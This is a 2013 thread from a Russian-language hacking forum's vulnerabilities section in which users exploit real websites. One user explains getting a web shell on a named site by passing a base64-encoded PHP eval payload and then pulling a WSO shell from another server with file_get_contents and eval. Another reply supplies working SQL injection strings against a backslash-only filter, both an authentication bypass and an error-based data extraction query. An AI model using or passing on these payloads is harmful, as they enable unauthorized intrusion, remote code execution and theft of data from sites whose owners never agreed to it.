HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22921  
Старый 26.10.2013, 12:17
Unknown
Guest
Сообщений: n/a
Провел на форуме:
16399

Репутация: 10
По умолчанию

Цитата:
Сообщение от noviks  
noviks said:
работает что так
что так
но файлы php не xочет показать
Что значит не хочет? Что пишет?
 
Ответить с цитированием

  #22922  
Старый 26.10.2013, 12:23
noviks
Guest
Сообщений: n/a
Провел на форуме:
4709

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ganz Euler  
Ganz Euler said:
Что значит не хочет? Что пишет?
ничего не пишет просто страница до конца не открывается и пусто
 
Ответить с цитированием

  #22923  
Старый 26.10.2013, 12:26
Unknown
Guest
Сообщений: n/a
Провел на форуме:
16399

Репутация: 10
По умолчанию

Цитата:
Сообщение от noviks  
noviks said:
ничего не пишет просто страница до конца не открывается и пусто
Ок, моя последняя догадка: возможно файлы читаются, но просто не отображаются в браузере. Попробуй посмотреть HTML код страницы(ctrl+f '
 
Ответить с цитированием

  #22924  
Старый 26.10.2013, 12:32
noviks
Guest
Сообщений: n/a
Провел на форуме:
4709

Репутация: 0
По умолчанию

[QUOTE="Ganz Euler"]
Ganz Euler said:
Ок, моя последняя догадка: возможно файлы читаются, но просто не отображаются в браузере. Попробуй посмотреть HTML код страницы(ctrl+f ' я об зтом сразу подумал, HTML код просто обрывается
 
Ответить с цитированием

  #22925  
Старый 26.10.2013, 12:35
noviks
Guest
Сообщений: n/a
Провел на форуме:
4709

Репутация: 0
По умолчанию

открыл /bin/sh но там одни крокозябры
 
Ответить с цитированием

  #22926  
Старый 26.10.2013, 12:39
Unknown
Guest
Сообщений: n/a
Провел на форуме:
16399

Репутация: 10
По умолчанию

Неудивительно, /bin/sh бинарный файл.

Если хочешь скинь сюда или в ЛС ссылку. http://go.jetswap.com/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtj bWRdKTsgPz4==&cmd=phpinfo%28%29; у меня не работает, пишет down.
 
Ответить с цитированием

  #22927  
Старый 26.10.2013, 12:46
noviks
Guest
Сообщений: n/a
Провел на форуме:
4709

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ganz Euler  
Ganz Euler said:
Неудивительно, /bin/sh бинарный файл.
Если хочешь скинь сюда или в ЛС ссылку. http://go.jetswap.com/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtj bWRdKTsgPz4==&cmd=phpinfo%28%29; у меня не работает, пишет down.
она уже и не работает ,вчера зря спалил
 
Ответить с цитированием

  #22928  
Старый 26.10.2013, 14:03
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от noviks  
noviks said:
она уже и не работает ,вчера зря спалил
ну раз дыру закрыли, разсказую, вобще не понимаю чё вы так долго там думали,

Цитата:
Сообщение от None  
http://go.jetswap.com/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtj bWRdKTsgPz4==&cmd=phpinfo%28%29;
этот кусок тут вобще не нужен был &cmd=phpinfo%28%29;

также как и PD9waHAgZXZhbCgkX0dFVFtj bWRdKTsgPz4==( в басе64 зашифрован код )

банально заливаете на другой серв код шелла, потом пишете код $a = file_get_contents("http://site.ru/wso.txt"); eval($a);

и усё, видите перед собой ваш шелл, там кругом права урезаны были, одни лишь папка была для записи cache
 
Ответить с цитированием

  #22929  
Старый 26.10.2013, 14:12
zombak18
Guest
Сообщений: n/a
Провел на форуме:
12404

Репутация: 0
По умолчанию

Есть идеи как провести иньекцию если фильтрует все символы кроме \

Executing: select * from user where username='admin\' and password='1'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1alert("invalid password");history.back(-1)

Если вставить куда нибудь сторонние символы напишет nothing to do here)

Есть варианты?
 
Ответить с цитированием

  #22930  
Старый 26.10.2013, 14:31
Unknown
Guest
Сообщений: n/a
Провел на форуме:
16399

Репутация: 10
По умолчанию

Цитата:
Сообщение от zombak18  
zombak18 said:
Есть идеи как провести иньекцию если фильтрует все символы кроме \
Executing: select * from user where username='admin\' and password='1'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1alert("invalid password");history.back(-1)
Если вставить куда нибудь сторонние символы напишет nothing to do here)
Есть варианты?
Ну смотри, ты ввёл логин admin\ и пароль 1. Получается:

select * from user where username='admin\' and password='1'

Выделенное зелёным интерпретируется как строка. Варианты например:

зайти без пароля

select * from user where username='admin\' and password=' or 1=1 -- '

Error-based эксплуатация:

select * from user where username='admin\' and password=' or 1=((select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2))))-- '

Про "сторонние символы" не понял.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ